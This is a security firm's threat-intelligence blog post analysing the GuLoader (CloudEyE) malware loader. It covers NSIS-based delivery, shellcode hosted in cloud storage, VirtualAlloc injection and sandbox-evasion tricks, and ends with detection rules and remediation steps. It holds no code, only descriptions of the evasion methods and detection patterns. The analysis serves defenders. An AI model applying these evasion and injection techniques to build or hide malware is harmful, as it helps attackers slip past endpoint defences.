BIPI is a Chennai-based engineering company that operates the control layer for modern digital infrastructure. We design and run cybersecurity defence, agentic AI systems, digital engineering, growth automation, and continuous compliance as one platform, so organisations can detect signals, decide in real time, and deliver continuously.

What cybersecurity services does BIPI offer?

Web, mobile, network, and API penetration testing (VAPT), red team engagements, cloud security architecture, Zero Trust deployments, 24/7 SOC operations, and detection engineering. We work with financial services, SaaS, and regulated mid-market companies across India, APAC, EMEA, and North America.

What AI services does BIPI build?

Custom AI agents, LLM integrations, autonomous decision systems, and AI Ops intelligence layers. Our agents are scoped, observable, and audited end-to-end. We do not ship demos. We ship production agents that take real action across your existing systems.

Which compliance frameworks does BIPI support?

ISO 27001:2022, SOC 2 Type II, PCI DSS, GDPR, and India's DPDPA. We treat compliance as an engineering program, not a paper exercise: continuous evidence generation, exception tracking, and 72-hour breach-readiness.

BIPI Private Limited is headquartered in Chennai, Tamil Nadu, India, and serves clients across APAC, EMEA, and North America.

How do I contact BIPI?

Email info@bipi.in for new engagements or careers@bipi.in for jobs. You can also use the contact form at bipi.in/contact. We respond within one business day.

BIPI

GuLoader Demystified: The Shellcode Smuggler Behind Mass Campaigns

Threat Intelligence

GuLoader (sold as CloudEyE) has delivered more malware families than almost any other loader by hiding shellcode in encrypted blobs on Google Drive, OneDrive, and Discord. Its NSIS and VirtualAlloc tricks confound most sandboxes.

By Arjun Raghavan, Security & Systems Lead, BIPI · September 14, 2024 · 9 min read

#guloader#cloudeye#malware-loader#shellcode#obfuscation

GuLoader, discovered in 2019 and sold commercially as CloudEyE by its Italian developers, occupies an unusual position in the malware ecosystem: it is a loader that has been used to deliver almost every major info-stealer and RAT family, including AgentTesla, Remcos, NanoCore, Formbook, and AveMaria. Its value proposition is not capabilities but evasion: it gets other malware past endpoint defenses with a reliability that pure-play RAT operators cannot match on their own.

NSIS-Based Delivery

Most GuLoader samples arrive as NSIS (Nullsoft Scriptable Install System) executables. NSIS is a legitimate open-source installer framework used by thousands of genuine software products. Antivirus engines are trained to be permissive with NSIS binaries because flagging them would produce enormous false-positive volumes. GuLoader exploits this trust by packaging its shellcode loader inside an NSIS installer that, when executed, extracts a Visual Basic Script or PowerShell dropper from an encrypted cabinet inside the NSIS archive.

Outer container: NSIS .exe, legitimate file format, low AV detection rate
Extracted component: VBScript or PowerShell with heavy string obfuscation
Script function: download encrypted shellcode blob from cloud storage URL
Cloud storage used: Google Drive, OneDrive, Dropbox, Discord CDN (all trusted, often not inspected by proxy)
Final stage: shellcode blob decrypted in memory and injected into a legitimate process

VirtualAlloc Obfuscation

GuLoader's shellcode loader uses a series of API calls that are individually legitimate but collectively constitute shellcode injection. The loader calls VirtualAlloc to reserve memory with PAGE_EXECUTE_READWRITE permissions, decrypts the shellcode blob using XOR or RC4 with a key derived from the process environment, copies the decrypted shellcode into the allocated region, and then uses a jmp instruction to transfer execution. The key innovation is that GuLoader generates unique shellcode decryption routines for each build using a metamorphic engine, meaning static signatures on the shellcode itself are ineffective.

Because the shellcode decryption key is derived from process environment variables at runtime, the same GuLoader sample will fail to decrypt on a machine with a different hostname, user SID, or system locale. This environment binding defeats cloud sandbox analysis unless the sandbox replicates the victim environment exactly.

Anti-Analysis Techniques

CPUID checks: verifies physical CPU core count (sandboxes often report 1-2 cores; real machines typically have 4+)
Timing attacks: calls GetTickCount before and after a busy-wait loop; if the elapsed time is wrong, sandbox is assumed
Debugger detection: checks NtGlobalFlag and IsDebuggerPresent, and also uses hardware breakpoint detection via SEH
Environment binding: derives decryption key from machine-specific values, causing decryption to fail in mismatched environments
API hashing: resolves Windows API functions by hash rather than name, defeating string-based detection
Direct syscalls: bypasses user-mode hooks by calling NT system call numbers directly with inline assembly

CloudEyE: The Legitimate Cover

GuLoader's developers market the tool as CloudEyE, a 'legitimate' software protection and distribution service. Their website advertises it as a way to protect intellectual property and distribute software via cloud storage. This creates a legal gray area: the developers have plausible deniability, and because CloudEyE is sold as a service, malware analysts cannot simply arrest the developers for writing code. Law enforcement has investigated but as of late 2023 the developers remain operational.

2019

GuLoader/CloudEyE first observed in the wild

20+

Distinct malware families delivered via GuLoader

~$500

Reported GuLoader monthly subscription price

Major cloud storage providers abused for shellcode hosting

Detection

Alert on VirtualAlloc calls with PAGE_EXECUTE_READWRITE followed by execution from that memory region (ETW-based detection or EDR telemetry)
Process: NSIS installer processes (with NSIS parent) spawning wscript.exe, powershell.exe, or mshta.exe are anomalous
Network: HTTP GET requests to google.com/uc?export=download or 1drv.ms from non-browser processes
Sysmon EventID 8 (CreateRemoteThread) into a new process from an NSIS or script host process
PowerShell Script Block Logging will capture the deobfuscated download URL and shellcode blob reference

Remediation

Enable TLS inspection for cloud storage domains (Google Drive, OneDrive, Dropbox) in your web proxy
Block file downloads from cloud storage domains to non-browser user-agent strings at the proxy layer
Enable ETW-based memory execution tracing in your EDR; alert on execute-from-heap patterns
Implement Script Block Logging for PowerShell and capture VBScript execution via Windows Script Host audit policy
Block NSIS installers via software restriction policy unless they are signed by a trusted publisher certificate in your allowlist

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.